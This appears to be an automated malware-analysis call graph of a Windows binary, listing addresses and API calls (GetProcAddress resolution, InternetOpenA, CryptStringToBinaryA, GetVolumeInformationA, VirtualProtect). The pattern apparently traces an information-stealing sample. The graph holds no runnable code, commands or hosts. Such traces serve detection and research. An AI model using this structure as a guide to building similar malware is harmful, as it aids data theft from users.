13765->13766 14993 9a0d90 13766->14993 13768 9a5e57 13769 9aa740 lstrcpy 13768->13769 13770 9a5e79 13769->13770 13771 991590 lstrcpy 13770->13771 13772 9a5e8d 13771->13772 13773 995960 34 API calls 13772->13773 13774 9a5e93 13773->13774 15000 9a0f40 13774->15000 13776 9a5e9e 13777 991590 lstrcpy 13776->13777 13778 9a5eb5 13777->13778 15005 9a1a10 13778->15005 13780 9a5eba 13781 9aa740 lstrcpy 13780->13781 13782 9a5ed6 13781->13782 15349 994fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13782->15349 13784 9a5edb 13785 991590 lstrcpy 13784->13785 13786 9a5f5b 13785->13786 15356 9a0740 13786->15356 13788 9a5f60 13789 9aa740 lstrcpy 13788->13789 13790 9a5f86 13789->13790 13791 991590 lstrcpy 13790->13791 13792 9a5f9a 13791->13792 13793 995960 34 API calls 13792->13793 13794 9a5fa0 13793->13794 13888 9945d1 RtlAllocateHeap 13887->13888 13890 994621 VirtualProtect 13888->13890 13890->13536 13892->13623 13895 9910c2 ctype 13893->13895 13894 9910fd 13894->13653 13895->13894 13896 9910e2 VirtualFree 13895->13896 13896->13894 13898 991233 GlobalMemoryStatusEx 13897->13898 13898->13656 13899->13680 13901 9aa7c2 13900->13901 13902 9aa7ec 13901->13902 13903 9aa7da lstrcpy 13901->13903 13902->13685 13903->13902 13905 9aa740 lstrcpy 13904->13905 13906 9a6833 13905->13906 13907 9aa9b0 4 API calls 13906->13907 13908 9a6845 13907->13908 13909 9aa8a0 lstrcpy 13908->13909 13910 9a684e 13909->13910 13911 9aa9b0 4 API calls 13910->13911 13912 9a6867 13911->13912 13913 9aa8a0 lstrcpy 13912->13913 13914 9a6870 13913->13914 13915 9aa9b0 4 API calls 13914->13915 13916 9a688a 13915->13916 13917 9aa8a0 lstrcpy 13916->13917 13918 9a6893 13917->13918 13919 9aa9b0 4 API calls 13918->13919 13920 9a68ac 13919->13920 13921 9aa8a0 lstrcpy 13920->13921 13922 9a68b5 13921->13922 13923 9aa9b0 4 API calls 13922->13923 13924 9a68cf 13923->13924 13925 9aa8a0 lstrcpy 13924->13925 13926 9a68d8 13925->13926 13927 9aa9b0 4 API calls 13926->13927 13928 9a68f3 13927->13928 13929 9aa8a0 lstrcpy 13928->13929 13930 9a68fc 13929->13930 13931 9aa7a0 lstrcpy 13930->13931 13932 9a6910 13931->13932 13932->13692 13934 9aa812 13933->13934 13934->13695 13936 9aa83f 13935->13936 13937 9a5b54 13936->13937 13938 9aa87b lstrcpy 13936->13938 13937->13705 13938->13937 13940 9aa8a0 lstrcpy 13939->13940 13941 9a6443 13940->13941 13942 9aa8a0 lstrcpy 13941->13942 13943 9a6455 13942->13943 13944 9aa8a0 lstrcpy 13943->13944 13945 9a6467 13944->13945 13946 9aa8a0 lstrcpy 13945->13946 13947 9a5b86 13946->13947 13947->13711 13949 9945c0 2 API calls 13948->13949 13950 9926b4 13949->13950 13951 9945c0 2 API calls 13950->13951 13952 9926d7 13951->13952 13953 9945c0 2 API calls 13952->13953 13954 9926f0 13953->13954 13955 9945c0 2 API calls 13954->13955 13956 992709 13955->13956 13957 9945c0 2 API calls 13956->13957 13958 992736 13957->13958 13959 9945c0 2 API calls 13958->13959 13960 99274f 13959->13960 13961 9945c0 2 API calls 13960->13961 13962 992768 13961->13962 13963 9945c0 2 API calls 13962->13963 13964 992795 13963->13964 13965 9945c0 2 API calls 13964->13965 13966 9927ae 13965->13966 13967 9945c0 2 API calls 13966->13967 13968 9927c7 13967->13968 13969 9945c0 2 API calls 13968->13969 13970 9927e0 13969->13970 13971 9945c0 2 API calls 13970->13971 13972 9927f9 13971->13972 13973 9945c0 2 API calls 13972->13973 13974 992812 13973->13974 13975 9945c0 2 API calls 13974->13975 13976 99282b 13975->13976 13977 9945c0 2 API calls 13976->13977 13978 992844 13977->13978 13979 9945c0 2 API calls 13978->13979 13980 99285d 13979->13980 13981 9945c0 2 API calls 13980->13981 13982 992876 13981->13982 13983 9945c0 2 API calls 13982->13983 13984 99288f 13983->13984 13985 9945c0 2 API calls 13984->13985 13986 9928a8 13985->13986 13987 9945c0 2 API calls 13986->13987 13988 9928c1 13987->13988 13989 9945c0 2 API calls 13988->13989 13990 9928da 13989->13990 13991 9945c0 2 API calls 13990->13991 13992 9928f3 13991->13992 13993 9945c0 2 API calls 13992->13993 13994 99290c 13993->13994 13995 9945c0 2 API calls 13994->13995 13996 992925 13995->13996 13997 9945c0 2 API calls 13996->13997 13998 99293e 13997->13998 13999 9945c0 2 API calls 13998->13999 14000 992957 13999->14000 14001 9945c0 2 API calls 14000->14001 14002 992970 14001->14002 14003 9945c0 2 API calls 14002->14003 14004 992989 14003->14004 14005 9945c0 2 API calls 14004->14005 14006 9929a2 14005->14006 14007 9945c0 2 API calls 14006->14007 14008 9929bb 14007->14008 14009 9945c0 2 API calls 14008->14009 14010 9929d4 14009->14010 14011 9945c0 2 API calls 14010->14011 14012 9929ed 14011->14012 14013 9945c0 2 API calls 14012->14013 14014 992a06 14013->14014 14015 9945c0 2 API calls 14014->14015 14016 992a1f 14015->14016 14017 9945c0 2 API calls 14016->14017 14018 992a38 14017->14018 14019 9945c0 2 API calls 14018->14019 14020 992a51 14019->14020 14021 9945c0 2 API calls 14020->14021 14022 992a6a 14021->14022 14023 9945c0 2 API calls 14022->14023 14024 992a83 14023->14024 14025 9945c0 2 API calls 14024->14025 14026 992a9c 14025->14026 14027 9945c0 2 API calls 14026->14027 14028 992ab5 14027->14028 14029 9945c0 2 API calls 14028->14029 14030 992ace 14029->14030 14031 9945c0 2 API calls 14030->14031 14032 992ae7 14031->14032 14033 9945c0 2 API calls 14032->14033 14034 992b00 14033->14034 14035 9945c0 2 API calls 14034->14035 14036 992b19 14035->14036 14037 9945c0 2 API calls 14036->14037 14038 992b32 14037->14038 14039 9945c0 2 API calls 14038->14039 14040 992b4b 14039->14040 14041 9945c0 2 API calls 14040->14041 14042 992b64 14041->14042 14043 9945c0 2 API calls 14042->14043 14044 992b7d 14043->14044 14045 9945c0 2 API calls 14044->14045 14046 992b96 14045->14046 14047 9945c0 2 API calls 14046->14047 14048 992baf 14047->14048 14049 9945c0 2 API calls 14048->14049 14050 992bc8 14049->14050 14051 9945c0 2 API calls 14050->14051 14052 992be1 14051->14052 14053 9945c0 2 API calls 14052->14053 14054 992bfa 14053->14054 14055 9945c0 2 API calls 14054->14055 14056 992c13 14055->14056 14057 9945c0 2 API calls 14056->14057 14058 992c2c 14057->14058 14059 9945c0 2 API calls 14058->14059 14060 992c45 14059->14060 14061 9945c0 2 API calls 14060->14061 14062 992c5e 14061->14062 14063 9945c0 2 API calls 14062->14063 14064 992c77 14063->14064 14065 9945c0 2 API calls 14064->14065 14066 992c90 14065->14066 14067 9945c0 2 API calls 14066->14067 14068 992ca9 14067->14068 14069 9945c0 2 API calls 14068->14069 14070 992cc2 14069->14070 14071 9945c0 2 API calls 14070->14071 14072 992cdb 14071->14072 14073 9945c0 2 API calls 14072->14073 14074 992cf4 14073->14074 14075 9945c0 2 API calls 14074->14075 14076 992d0d 14075->14076 14077 9945c0 2 API calls 14076->14077 14078 992d26 14077->14078 14079 9945c0 2 API calls 14078->14079 14080 992d3f 14079->14080 14081 9945c0 2 API calls 14080->14081 14082 992d58 14081->14082 14083 9945c0 2 API calls 14082->14083 14084 992d71 14083->14084 14085 9945c0 2 API calls 14084->14085 14086 992d8a 14085->14086 14087 9945c0 2 API calls 14086->14087 14088 992da3 14087->14088 14089 9945c0 2 API calls 14088->14089 14090 992dbc 14089->14090 14091 9945c0 2 API calls 14090->14091 14092 992dd5 14091->14092 14093 9945c0 2 API calls 14092->14093 14094 992dee 14093->14094 14095 9945c0 2 API calls 14094->14095 14096 992e07 14095->14096 14097 9945c0 2 API calls 14096->14097 14098 992e20 14097->14098 14099 9945c0 2 API calls 14098->14099 14100 992e39 14099->14100 14101 9945c0 2 API calls 14100->14101 14102 992e52 14101->14102 14103 9945c0 2 API calls 14102->14103 14104 992e6b 14103->14104 14105 9945c0 2 API calls 14104->14105 14106 992e84 14105->14106 14107 9945c0 2 API calls 14106->14107 14108 992e9d 14107->14108 14109 9945c0 2 API calls 14108->14109 14110 992eb6 14109->14110 14111 9945c0 2 API calls 14110->14111 14112 992ecf 14111->14112 14113 9945c0 2 API calls 14112->14113 14114 992ee8 14113->14114 14115 9945c0 2 API calls 14114->14115 14116 992f01 14115->14116 14117 9945c0 2 API calls 14116->14117 14118 992f1a 14117->14118 14119 9945c0 2 API calls 14118->14119 14120 992f33 14119->14120 14121 9945c0 2 API calls 14120->14121 14122 992f4c 14121->14122 14123 9945c0 2 API calls 14122->14123 14124 992f65 14123->14124 14125 9945c0 2 API calls 14124->14125 14126 992f7e 14125->14126 14127 9945c0 2 API calls 14126->14127 14128 992f97 14127->14128 14129 9945c0 2 API calls 14128->14129 14130 992fb0 14129->14130 14131 9945c0 2 API calls 14130->14131 14132 992fc9 14131->14132 14133 9945c0 2 API calls 14132->14133 14134 992fe2 14133->14134 14135 9945c0 2 API calls 14134->14135 14136 992ffb 14135->14136 14137 9945c0 2 API calls 14136->14137 14138 993014 14137->14138 14139 9945c0 2 API calls 14138->14139 14140 99302d 14139->14140 14141 9945c0 2 API calls 14140->14141 14142 993046 14141->14142 14143 9945c0 2 API calls 14142->14143 14144 99305f 14143->14144 14145 9945c0 2 API calls 14144->14145 14146 993078 14145->14146 14147 9945c0 2 API calls 14146->14147 14148 993091 14147->14148 14149 9945c0 2 API calls 14148->14149 14150 9930aa 14149->14150 14151 9945c0 2 API calls 14150->14151 14152 9930c3 14151->14152 14153 9945c0 2 API calls 14152->14153 14154 9930dc 14153->14154 14155 9945c0 2 API calls 14154->14155 14156 9930f5 14155->14156 14157 9945c0 2 API calls 14156->14157 14158 99310e 14157->14158 14159 9945c0 2 API calls 14158->14159 14160 993127 14159->14160 14161 9945c0 2 API calls 14160->14161 14162 993140 14161->14162 14163 9945c0 2 API calls 14162->14163 14164 993159 14163->14164 14165 9945c0 2 API calls 14164->14165 14166 993172 14165->14166 14167 9945c0 2 API calls 14166->14167 14168 99318b 14167->14168 14169 9945c0 2 API calls 14168->14169 14170 9931a4 14169->14170 14171 9945c0 2 API calls 14170->14171 14172 9931bd 14171->14172 14173 9945c0 2 API calls 14172->14173 14174 9931d6 14173->14174 14175 9945c0 2 API calls 14174->14175 14176 9931ef 14175->14176 14177 9945c0 2 API calls 14176->14177 14178 993208 14177->14178 14179 9945c0 2 API calls 14178->14179 14180 993221 14179->14180 14181 9945c0 2 API calls 14180->14181 14182 99323a 14181->14182 14183 9945c0 2 API calls 14182->14183 14184 993253 14183->14184 14185 9945c0 2 API calls 14184->14185 14186 99326c 14185->14186 14187 9945c0 2 API calls 14186->14187 14188 993285 14187->14188 14189 9945c0 2 API calls 14188->14189 14190 99329e 14189->14190 14191 9945c0 2 API calls 14190->14191 14192 9932b7 14191->14192 14193 9945c0 2 API calls 14192->14193 14194 9932d0 14193->14194 14195 9945c0 2 API calls 14194->14195 14196 9932e9 14195->14196 14197 9945c0 2 API calls 14196->14197 14198 993302 14197->14198 14199 9945c0 2 API calls 14198->14199 14200 99331b 14199->14200 14201 9945c0 2 API calls 14200->14201 14202 993334 14201->14202 14203 9945c0 2 API calls 14202->14203 14204 99334d 14203->14204 14205 9945c0 2 API calls 14204->14205 14206 993366 14205->14206 14207 9945c0 2 API calls 14206->14207 14208 99337f 14207->14208 14209 9945c0 2 API calls 14208->14209 14210 993398 14209->14210 14211 9945c0 2 API calls 14210->14211 14212 9933b1 14211->14212 14213 9945c0 2 API calls 14212->14213 14214 9933ca 14213->14214 14215 9945c0 2 API calls 14214->14215 14216 9933e3 14215->14216 14217 9945c0 2 API calls 14216->14217 14218 9933fc 14217->14218 14219 9945c0 2 API calls 14218->14219 14220 993415 14219->14220 14221 9945c0 2 API calls 14220->14221 14222 99342e 14221->14222 14223 9945c0 2 API calls 14222->14223 14224 993447 14223->14224 14225 9945c0 2 API calls 14224->14225 14226 993460 14225->14226 14227 9945c0 2 API calls 14226->14227 14228 993479 14227->14228 14229 9945c0 2 API calls 14228->14229 14230 993492 14229->14230 14231 9945c0 2 API calls 14230->14231 14232 9934ab 14231->14232 14233 9945c0 2 API calls 14232->14233 14234 9934c4 14233->14234 14235 9945c0 2 API calls 14234->14235 14236 9934dd 14235->14236 14237 9945c0 2 API calls 14236->14237 14238 9934f6 14237->14238 14239 9945c0 2 API calls 14238->14239 14240 99350f 14239->14240 14241 9945c0 2 API calls 14240->14241 14242 993528 14241->14242 14243 9945c0 2 API calls 14242->14243 14244 993541 14243->14244 14245 9945c0 2 API calls 14244->14245 14246 99355a 14245->14246 14247 9945c0 2 API calls 14246->14247 14248 993573 14247->14248 14249 9945c0 2 API calls 14248->14249 14250 99358c 14249->14250 14251 9945c0 2 API calls 14250->14251 14252 9935a5 14251->14252 14253 9945c0 2 API calls 14252->14253 14254 9935be 14253->14254 14255 9945c0 2 API calls 14254->14255 14256 9935d7 14255->14256 14257 9945c0 2 API calls 14256->14257 14258 9935f0 14257->14258 14259 9945c0 2 API calls 14258->14259 14260 993609 14259->14260 14261 9945c0 2 API calls 14260->14261 14262 993622 14261->14262 14263 9945c0 2 API calls 14262->14263 14264 99363b 14263->14264 14265 9945c0 2 API calls 14264->14265 14266 993654 14265->14266 14267 9945c0 2 API calls 14266->14267 14268 99366d 14267->14268 14269 9945c0 2 API calls 14268->14269 14270 993686 14269->14270 14271 9945c0 2 API calls 14270->14271 14272 99369f 14271->14272 14273 9945c0 2 API calls 14272->14273 14274 9936b8 14273->14274 14275 9945c0 2 API calls 14274->14275 14276 9936d1 14275->14276 14277 9945c0 2 API calls 14276->14277 14278 9936ea 14277->14278 14279 9945c0 2 API calls 14278->14279 14280 993703 14279->14280 14281 9945c0 2 API calls 14280->14281 14282 99371c 14281->14282 14283 9945c0 2 API calls 14282->14283 14284 993735 14283->14284 14285 9945c0 2 API calls 14284->14285 14286 99374e 14285->14286 14287 9945c0 2 API calls 14286->14287 14288 993767 14287->14288 14289 9945c0 2 API calls 14288->14289 14290 993780 14289->14290 14291 9945c0 2 API calls 14290->14291 14292 993799 14291->14292 14293 9945c0 2 API calls 14292->14293 14294 9937b2 14293->14294 14295 9945c0 2 API calls 14294->14295 14296 9937cb 14295->14296 14297 9945c0 2 API calls 14296->14297 14298 9937e4 14297->14298 14299 9945c0 2 API calls 14298->14299 14300 9937fd 14299->14300 14301 9945c0 2 API calls 14300->14301 14302 993816 14301->14302 14303 9945c0 2 API calls 14302->14303 14304 99382f 14303->14304 14305 9945c0 2 API calls 14304->14305 14306 993848 14305->14306 14307 9945c0 2 API calls 14306->14307 14308 993861 14307->14308 14309 9945c0 2 API calls 14308->14309 14310 99387a 14309->14310 14311 9945c0 2 API calls 14310->14311 14312 993893 14311->14312 14313 9945c0 2 API calls 14312->14313 14314 9938ac 14313->14314 14315 9945c0 2 API calls 14314->14315 14316 9938c5 14315->14316 14317 9945c0 2 API calls 14316->14317 14318 9938de 14317->14318 14319 9945c0 2 API calls 14318->14319 14320 9938f7 14319->14320 14321 9945c0 2 API calls 14320->14321 14322 993910 14321->14322 14323 9945c0 2 API calls 14322->14323 14324 993929 14323->14324 14325 9945c0 2 API calls 14324->14325 14326 993942 14325->14326 14327 9945c0 2 API calls 14326->14327 14328 99395b 14327->14328 14329 9945c0 2 API calls 14328->14329 14330 993974 14329->14330 14331 9945c0 2 API calls 14330->14331 14332 99398d 14331->14332 14333 9945c0 2 API calls 14332->14333 14334 9939a6 14333->14334 14335 9945c0 2 API calls 14334->14335 14336 9939bf 14335->14336 14337 9945c0 2 API calls 14336->14337 14338 9939d8 14337->14338 14339 9945c0 2 API calls 14338->14339 14340 9939f1 14339->14340 14341 9945c0 2 API calls 14340->14341 14342 993a0a 14341->14342 14343 9945c0 2 API calls 14342->14343 14344 993a23 14343->14344 14345 9945c0 2 API calls 14344->14345 14346 993a3c 14345->14346 14347 9945c0 2 API calls 14346->14347 14348 993a55 14347->14348 14349 9945c0 2 API calls 14348->14349 14350 993a6e 14349->14350 14351 9945c0 2 API calls 14350->14351 14352 993a87 14351->14352 14353 9945c0 2 API calls 14352->14353 14354 993aa0 14353->14354 14355 9945c0 2 API calls 14354->14355 14356 993ab9 14355->14356 14357 9945c0 2 API calls 14356->14357 14358 993ad2 14357->14358 14359 9945c0 2 API calls 14358->14359 14360 993aeb 14359->14360 14361 9945c0 2 API calls 14360->14361 14362 993b04 14361->14362 14363 9945c0 2 API calls 14362->14363 14364 993b1d 14363->14364 14365 9945c0 2 API calls 14364->14365 14366 993b36 14365->14366 14367 9945c0 2 API calls 14366->14367 14368 993b4f 14367->14368 14369 9945c0 2 API calls 14368->14369 14370 993b68 14369->14370 14371 9945c0 2 API calls 14370->14371 14372 993b81 14371->14372 14373 9945c0 2 API calls 14372->14373 14374 993b9a 14373->14374 14375 9945c0 2 API calls 14374->14375 14376 993bb3 14375->14376 14377 9945c0 2 API calls 14376->14377 14378 993bcc 14377->14378 14379 9945c0 2 API calls 14378->14379 14380 993be5 14379->14380 14381 9945c0 2 API calls 14380->14381 14382 993bfe 14381->14382 14383 9945c0 2 API calls 14382->14383 14384 993c17 14383->14384 14385 9945c0 2 API calls 14384->14385 14386 993c30 14385->14386 14387 9945c0 2 API calls 14386->14387 14388 993c49 14387->14388 14389 9945c0 2 API calls 14388->14389 14390 993c62 14389->14390 14391 9945c0 2 API calls 14390->14391 14392 993c7b 14391->14392 14393 9945c0 2 API calls 14392->14393 14394 993c94 14393->14394 14395 9945c0 2 API calls 14394->14395 14396 993cad 14395->14396 14397 9945c0 2 API calls 14396->14397 14398 993cc6 14397->14398 14399 9945c0 2 API calls 14398->14399 14400 993cdf 14399->14400 14401 9945c0 2 API calls 14400->14401 14402 993cf8 14401->14402 14403 9945c0 2 API calls 14402->14403 14404 993d11 14403->14404 14405 9945c0 2 API calls 14404->14405 14406 993d2a 14405->14406 14407 9945c0 2 API calls 14406->14407 14408 993d43 14407->14408 14409 9945c0 2 API calls 14408->14409 14410 993d5c 14409->14410 14411 9945c0 2 API calls 14410->14411 14412 993d75 14411->14412 14413 9945c0 2 API calls 14412->14413 14414 993d8e 14413->14414 14415 9945c0 2 API calls 14414->14415 14416 993da7 14415->14416 14417 9945c0 2 API calls 14416->14417 14418 993dc0 14417->14418 14419 9945c0 2 API calls 14418->14419 14420 993dd9 14419->14420 14421 9945c0 2 API calls 14420->14421 14422 993df2 14421->14422 14423 9945c0 2 API calls 14422->14423 14424 993e0b 14423->14424 14425 9945c0 2 API calls 14424->14425 14426 993e24 14425->14426 14427 9945c0 2 API calls 14426->14427 14428 993e3d 14427->14428 14429 9945c0 2 API calls 14428->14429 14430 993e56 14429->14430 14431 9945c0 2 API calls 14430->14431 14432 993e6f 14431->14432 14433 9945c0 2 API calls 14432->14433 14434 993e88 14433->14434 14435 9945c0 2 API calls 14434->14435 14436 993ea1 14435->14436 14437 9945c0 2 API calls 14436->14437 14438 993eba 14437->14438 14439 9945c0 2 API calls 14438->14439 14440 993ed3 14439->14440 14441 9945c0 2 API calls 14440->14441 14442 993eec 14441->14442 14443 9945c0 2 API calls 14442->14443 14444 993f05 14443->14444 14445 9945c0 2 API calls 14444->14445 14446 993f1e 14445->14446 14447 9945c0 2 API calls 14446->14447 14448 993f37 14447->14448 14449 9945c0 2 API calls 14448->14449 14450 993f50 14449->14450 14451 9945c0 2 API calls 14450->14451 14452 993f69 14451->14452 14453 9945c0 2 API calls 14452->14453 14454 993f82 14453->14454 14455 9945c0 2 API calls 14454->14455 14456 993f9b 14455->14456 14457 9945c0 2 API calls 14456->14457 14458 993fb4 14457->14458 14459 9945c0 2 API calls 14458->14459 14460 993fcd 14459->14460 14461 9945c0 2 API calls 14460->14461 14462 993fe6 14461->14462 14463 9945c0 2 API calls 14462->14463 14464 993fff 14463->14464 14465 9945c0 2 API calls 14464->14465 14466 994018 14465->14466 14467 9945c0 2 API calls 14466->14467 14468 994031 14467->14468 14469 9945c0 2 API calls 14468->14469 14470 99404a 14469->14470 14471 9945c0 2 API calls 14470->14471 14472 994063 14471->14472 14473 9945c0 2 API calls 14472->14473 14474 99407c 14473->14474 14475 9945c0 2 API calls 14474->14475 14476 994095 14475->14476 14477 9945c0 2 API calls 14476->14477 14478 9940ae 14477->14478 14479 9945c0 2 API calls 14478->14479 14480 9940c7 14479->14480 14481 9945c0 2 API calls 14480->14481 14482 9940e0 14481->14482 14483 9945c0 2 API calls 14482->14483 14484 9940f9 14483->14484 14485 9945c0 2 API calls 14484->14485 14486 994112 14485->14486 14487 9945c0 2 API calls 14486->14487 14488 99412b 14487->14488 14489 9945c0 2 API calls 14488->14489 14490 994144 14489->14490 14491 9945c0 2 API calls 14490->14491 14492 99415d 14491->14492 14493 9945c0 2 API calls 14492->14493 14494 994176 14493->14494 14495 9945c0 2 API calls 14494->14495 14496 99418f 14495->14496 14497 9945c0 2 API calls 14496->14497 14498 9941a8 14497->14498 14499 9945c0 2 API calls 14498->14499 14500 9941c1 14499->14500 14501 9945c0 2 API calls 14500->14501 14502 9941da 14501->14502 14503 9945c0 2 API calls 14502->14503 14504 9941f3 14503->14504 14505 9945c0 2 API calls 14504->14505 14506 99420c 14505->14506 14507 9945c0 2 API calls 14506->14507 14508 994225 14507->14508 14509 9945c0 2 API calls 14508->14509 14510 99423e 14509->14510 14511 9945c0 2 API calls 14510->14511 14512 994257 14511->14512 14513 9945c0 2 API calls 14512->14513 14514 994270 14513->14514 14515 9945c0 2 API calls 14514->14515 14516 994289 14515->14516 14517 9945c0 2 API calls 14516->14517 14518 9942a2 14517->14518 14519 9945c0 2 API calls 14518->14519 14520 9942bb 14519->14520 14521 9945c0 2 API calls 14520->14521 14522 9942d4 14521->14522 14523 9945c0 2 API calls 14522->14523 14524 9942ed 14523->14524 14525 9945c0 2 API calls 14524->14525 14526 994306 14525->14526 14527 9945c0 2 API calls 14526->14527 14528 99431f 14527->14528 14529 9945c0 2 API calls 14528->14529 14530 994338 14529->14530 14531 9945c0 2 API calls 14530->14531 14532 994351 14531->14532 14533 9945c0 2 API calls 14532->14533 14534 99436a 14533->14534 14535 9945c0 2 API calls 14534->14535 14536 994383 14535->14536 14537 9945c0 2 API calls 14536->14537 14538 99439c 14537->14538 14539 9945c0 2 API calls 14538->14539 14540 9943b5 14539->14540 14541 9945c0 2 API calls 14540->14541 14542 9943ce 14541->14542 14543 9945c0 2 API calls 14542->14543 14544 9943e7 14543->14544 14545 9945c0 2 API calls 14544->14545 14546 994400 14545->14546 14547 9945c0 2 API calls 14546->14547 14548 994419 14547->14548 14549 9945c0 2 API calls 14548->14549 14550 994432 14549->14550 14551 9945c0 2 API calls 14550->14551 14552 99444b 14551->14552 14553 9945c0 2 API calls 14552->14553 14554 994464 14553->14554 14555 9945c0 2 API calls 14554->14555 14556 99447d 14555->14556 14557 9945c0 2 API calls 14556->14557 14558 994496 14557->14558 14559 9945c0 2 API calls 14558->14559 14560 9944af 14559->14560 14561 9945c0 2 API calls 14560->14561 14562 9944c8 14561->14562 14563 9945c0 2 API calls 14562->14563 14564 9944e1 14563->14564 14565 9945c0 2 API calls 14564->14565 14566 9944fa 14565->14566 14567 9945c0 2 API calls 14566->14567 14568 994513 14567->14568 14569 9945c0 2 API calls 14568->14569 14570 99452c 14569->14570 14571 9945c0 2 API calls 14570->14571 14572 994545 14571->14572 14573 9945c0 2 API calls 14572->14573 14574 99455e 14573->14574 14575 9945c0 2 API calls 14574->14575 14576 994577 14575->14576 14577 9945c0 2 API calls 14576->14577 14578 994590 14577->14578 14579 9945c0 2 API calls 14578->14579 14580 9945a9 14579->14580 14581 9a9c10 14580->14581 14582 9a9c20 43 API calls 14581->14582 14583 9aa036 8 API calls 14581->14583 14582->14583 14584 9aa0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14583->14584 14585 9aa146 14583->14585 14584->14585 14586 9aa153 8 API calls 14585->14586 14587 9aa216 14585->14587 14586->14587 14588 9aa298 14587->14588 14589 9aa21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14587->14589 14590 9aa337 14588->14590 14591 9aa2a5 6 API calls 14588->14591 14589->14588 14592 9aa41f 14590->14592 14593 9aa344 9 API calls 14590->14593 14591->14590 14594 9aa428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14592->14594 14595 9aa4a2 14592->14595 14593->14592 14594->14595 14596 9aa4ab GetProcAddress GetProcAddress 14595->14596 14597 9aa4dc 14595->14597 14596->14597 14598 9aa515 14597->14598 14599 9aa4e5 GetProcAddress GetProcAddress 14597->14599 14600 9aa612 14598->14600 14601 9aa522 10 API calls 14598->14601 14599->14598 14602 9aa61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14600->14602 14603 9aa67d 14600->14603 14601->14600 14602->14603 14604 9aa69e 14603->14604 14605 9aa686 GetProcAddress 14603->14605 14606 9a5ca3 14604->14606 14607 9aa6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14604->14607 14605->14604 14608 991590 14606->14608 14607->14606 15727 991670 14608->15727 14611 9aa7a0 lstrcpy 14612 9915b5 14611->14612 14613 9aa7a0 lstrcpy 14612->14613 14614 9915c7 14613->14614 14615 9aa7a0 lstrcpy 14614->14615 14616 9915d9 14615->14616 14617 9aa7a0 lstrcpy 14616->14617 14618 991663 14617->14618 14619 9a5510 14618->14619 14620 9a5521 14619->14620 14621 9aa820 2 API calls 14620->14621 14622 9a552e 14621->14622 14623 9aa820 2 API calls 14622->14623 14624 9a553b 14623->14624 14625 9aa820 2 API calls 14624->14625 14626 9a5548 14625->14626 14627 9aa740 lstrcpy 14626->14627 14628 9a5555 14627->14628 14629 9aa740 lstrcpy 14628->14629 14630 9a5562 14629->14630 14631 9aa740 lstrcpy 14630->14631 14632 9a556f 14631->14632 14633 9aa740 lstrcpy 14632->14633 14670 9a557c 14633->14670 14634 9a5643 StrCmpCA 14634->14670 14635 9a56a0 StrCmpCA 14636 9a57dc 14635->14636 14635->14670 14637 9aa8a0 lstrcpy 14636->14637 14639 9a57e8 14637->14639 14638 991590 lstrcpy 14638->14670 14641 9aa820 2 API calls 14639->14641 14640 9aa820 lstrlen lstrcpy 14640->14670 14642 9a57f6 14641->14642 14646 9aa820 2 API calls 14642->14646 14643 9a5856 StrCmpCA 14644 9a5991 14643->14644 14643->14670 14647 9aa8a0 lstrcpy 14644->14647 14645 9aa7a0 lstrcpy 14645->14670 14648 9a5805 14646->14648 14649 9a599d 14647->14649 14650 991670 lstrcpy 14648->14650 14652 9aa820 2 API calls 14649->14652 14671 9a5811 14650->14671 14651 9aa740 lstrcpy 14651->14670 14654 9a59ab 14652->14654 14653 9a5a0b StrCmpCA 14655 9a5a28 14653->14655 14656 9a5a16 Sleep 14653->14656 14657 9aa820 2 API calls 14654->14657 14658 9aa8a0 lstrcpy 14655->14658 14656->14670 14659 9a59ba 14657->14659 14661 9a5a34 14658->14661 14660 991670 lstrcpy 14659->14660 14660->14671 14662 9aa820 2 API calls 14661->14662 14663 9a5a43 14662->14663 14665 9aa820 2 API calls 14663->14665 14664 9a52c0 25 API calls 14664->14670 14666 9a5a52 14665->14666 14668 991670 lstrcpy 14666->14668 14667 9a578a StrCmpCA 14667->14670 14668->14671 14669 9a593f StrCmpCA 14669->14670 14670->14634 14670->14635 14670->14638 14670->14640 14670->14643 14670->14645 14670->14651 14670->14653 14670->14664 14670->14667 14670->14669 14672 9a51f0 20 API calls 14670->14672 14673 9aa8a0 lstrcpy 14670->14673 14671->13726 14672->14670 14673->14670 14675 9a754c 14674->14675 14676 9a7553 GetVolumeInformationA 14674->14676 14675->14676 14677 9a7591 14676->14677 14678 9a75fc GetProcessHeap RtlAllocateHeap 14677->14678 14679 9a7628 wsprintfA 14678->14679 14680 9a7619 14678->14680 14681 9aa740 lstrcpy 14679->14681 14682 9aa740 lstrcpy 14680->14682 14683 9a5da7 14681->14683 14682->14683 14683->13747 14685 9aa7a0 lstrcpy 14684->14685 14686 994899 14685->14686 15736 9947b0 14686->15736 14688 9948a5 14689 9aa740 lstrcpy 14688->14689 14690 9948d7 14689->14690 14691 9aa740 lstrcpy 14690->14691 14692 9948e4 14691->14692 14693 9aa740 lstrcpy 14692->14693 14694 9948f1 14693->14694 14695 9aa740 lstrcpy 14694->14695 14696 9948fe 14695->14696 14697 9aa740 lstrcpy 14696->14697 14698 99490b InternetOpenA StrCmpCA 14697->14698 14699 994944 14698->14699 14700 994ecb InternetCloseHandle 14699->14700 15742 9a8b60 14699->15742 14702 994ee8 14700->14702 15757 999ac0 CryptStringToBinaryA 14702->15757 14703 994963 15750 9aa920 14703->15750 14706 994976 14708 9aa8a0 lstrcpy 14706->14708 14714 99497f 14708->14714 14709 9aa820 2 API calls 14710 994f05 14709->14710 14711 9aa9b0 4 API calls 14710->14711 14713 994f1b 14711->14713 14712 994f27 ctype 14716 9aa7a0 lstrcpy 14712->14716 14715 9aa8a0 lstrcpy 14713->14715 14717 9aa9b0 4 API calls 14714->14717 14715->14712 14729 994f57 14716->14729 14718 9949a9 14717->14718 14719 9aa8a0 lstrcpy 14718->14719 14720 9949b2 14719->14720 14721 9aa9b0 4 API calls 14720->14721 14722 9949d1 14721->14722 14723 9aa8a0 lstrcpy 14722->14723 14724 9949da 14723->14724 14725 9aa920 3 API calls 14724->14725 14726 9949f8 14725->14726 14727 9aa8a0 lstrcpy 14726->14727 14728 994a01 14727->14728 14730 9aa9b0 4 API calls 14728->14730 14729->13750 14731 994a20 14730->14731 14732 9aa8a0 lstrcpy 14731->14732 14733 994a29 14732->14733 14734 9aa9b0 4 API calls 14733->14734 14735 994a48 14734->14735 14736 9aa8a0 lstrcpy 